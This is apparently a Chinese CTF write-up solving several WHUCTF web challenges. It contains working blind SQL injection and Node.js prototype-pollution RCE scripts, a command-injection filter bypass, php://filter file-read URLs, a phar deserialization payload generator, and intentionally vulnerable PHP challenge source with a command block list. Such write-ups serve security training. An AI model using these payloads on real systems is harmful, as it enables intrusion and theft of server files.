简单的注入,过滤了东西双写绕就行
import requests
import time
table ="(selselectect group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema regexp database())"
column="(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='f1ag_y0u_wi1l_n3ver_kn0w')"
data = "(seselectlect group_concat(f111114g) frfromom f1ag_y0u_wi1l_n3ver_kn0w)"
url = "http://218.197.154.9:10011/login.php"
payload = {"user":"","pass":"2"}
x=""
for i in range(0,1000):
max = 127
min = 33
while max >= min:
mid = (max + min) // 2
str = payload
str['user'] = 'adm\'oorr ascii(substr({},{},1))>{}#'.format(data, i, mid)
# print(url+exp)
r = requests.post(url,data=str)
# print(r.text)
if ('Login success!' in r.text):#
min = mid + 1
else:
max = mid
if max == mid == min:
x += chr(mid)
print(x)
break
flag:
WHUCTF{r3lly_re11y_n0t_d1ffIcult_yet??~}
ezphp
<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
//1st
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
echo '1st ok'."<br>";
}
else{
die('会代码审计嘛23333');
}
//2nd
if(is_numeric($string_1)){
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
$a = strtr($md5_1, 'pggnb', '12345');
$b = strtr($md5_2, 'pggnb', '12345');
if($a == $b){
echo '2nd ok'."<br>";
}
else{
die("can u give me the right str???");
}
}
else{
die("no!!!!!!!!");
}
}
else{
die('is str1 numeric??????');
}
//3nd
function filter($string){
return preg_replace('/x/', 'yy', $string);
}
$username = $_POST['username'];
$password = "aaaaa";
$user = array($username, $password);
$r = filter(serialize($user));
if(unserialize($r)[1] == "123456"){
echo file_get_contents('flag.php');
}
第一层%0a,第二层脚本跑一下
<?php
$count = 0;
for ($i = 1; $i <= 100000000; $i++) {
$md5 = strtr(md5($i), 'pggnb', '12345');
if (preg_match('/^0e\d+$/', $md5)) {
echo $i . " " . md5($i) . "<br>";
$count++;
}
if ($count == 2) {
break;
}
}
第三层反序列化字符串逃逸
xxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}
第三层如果不懂可以看下
ezcmd
源码:
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("no space!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("no flag");
} else if(preg_match("/tac|rm|echo|cat|nl|less|more|tail|head/", $ip)){
die("cat't read flag");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
highlight_file(__FILE__);
?>
乍一看过滤了很多
其实和[GXYCTF2019 ping ping ping ]一题比较类似
让cat执行ls的结果
?ip=127.0.0.1;ca\t$IFS$9ls
ezinclude
脑洞题目,在contact中隐藏了参数file,直接伪协议读
thankyou.php?firstname=1&lastname=2&country=australia&subject=&file=php://filter/read=convert.base64-encode/resource=flag.php
Easy_unserialize
反序列化+phar
抓包过程中发现在主页有一个acti0n=????的行为,伪协议读源码返回了hack,大小写绕一下就能读到源码了
?acti0n=PhP://Filter/convert.Base64-encode/resource=view.php
拿到源码
<html lang="zh">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<link type = "text/css" rel = "stylesheet" href = "css/style.css">
</head>
<body>
<script type = "text/javascript" color = "0,0,255" opacity = '0.7' zIndex = "-2" count = "99" src = 'js/canvas-nest.min.js'></script>
#include_once "flag.php";
error_reporting(0);
class View
{
public $dir;
private $cmd;
function __construct()
{
$this->dir = 'upload/'.md5($_SERVER['REMOTE_ADDR']).'/';
$this->cmd = 'echo "<div style=\"text-align: center;position: absolute;left: 0;bottom: 0;width: 100%;height: 30px;\">Powered by: xxx</div>";';
if(!is_dir($this->dir)) {
mkdir($this->dir, 0777, true);
}
}
function get_file_list() {
$file = scandir('.');
return $file;
}
function show_file_list() {
$file = $this->get_file_list();
for ($i = 2; $i < sizeof($file); $i++) {
echo "<p align=\"center\" style=\"font-weight: bold;\">[".strval($i - 1)."] $file[$i] </p>";
}
}
function show_img($file_name) {
$name = $file_name;
$width = getimagesize($name)[0];
$height = getimagesize($name)[1];
$times = $width / 200;
$width /= $times;
$height /= $times;
$template = "<img style=\"clear: both;display: block;margin: auto;\" src=\"$this->dir$name\" alt=\"$file_name\" width = \"$width\" height = \"$height\">";
echo $template;
}
function delete_img($file_name) {
$name = $file_name;
if (file_exists($name)) {
@unlink($name);
if(!file_exists($name)) {
echo "<p align=\"center\" style=\"font-weight: bold;\">æ••å••å• é•¤! 3s啕跳转</p>";
header("refresh:3;url=view.php");
} else {
echo "Can not delete!";
exit;
}
} else {
echo "<p align=\"center\" style=\"font-weight: bold;\">敾丕啰迕个敕件! </p>";
}
}
function __destruct() {
eval($this->cmd);
}
}
$ins = new View();
chdir($ins->dir);
echo "<h3>录啕畮录为 " . $ins->dir . "</h3>";
$ins->show_file_list();
if (isset($_POST['show'])) {
$file_name = $_POST['show'];
$ins->show_img($file_name);
}
if (isset($_POST['delete'])) {
$file_name = $_POST['delete'];
$ins->delete_img($file_name);
}
unset($ins);
</body>
</html>
很明显的phar
在show参数触发即可
<?php
class View
{
public $dir;
private $cmd="show_source(\"/var/www/html/flag.php\");";
}
$a=new View();
@unlink("phar.phar");
$phar = new Phar("5.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.jpg", "test");
$phar->stopBuffering();
需要注意的是可能需要多包含几次
HappyGame
nodejs原型链污染,可以看官方wp
https://blog.szfszf.top/article/43/
非预期脚本:
import requests
import time
import string
import json
url = "http://218.197.154.9:10001/record"
def deco(idx, c):
p = ''.join(['\\x' + hex(ord(i))[2:] for i in f'if(process.mainModule.require("fs").readFileSync("/flag").toString()[{idx}]>"{c}"){{}}else{{throw Error()}}']);
r = {"score":{"__proto__":{"__proto__":{"a":"_$$ND_FUNC$$_`.constructor.constructor(
" + p + "`)()"}},"length":4}}
return r
flag =''
for i in range(0,1000):
max = 127
min = 32
while max >=min:
#print(str(max)+"-------"+str(min))
mid = (max + min) // 2
r = requests.post(url, json=deco(i, chr(mid)))
if r.status_code==200:
min = mid +1
else:
max = mid
if max == mid == min:
flag += chr(mid)
print(flag)
break
if '}' in flag[:-1]:
exit()
BookShop
ha1c9on师傅tql
@wh1sper 别骂了别骂了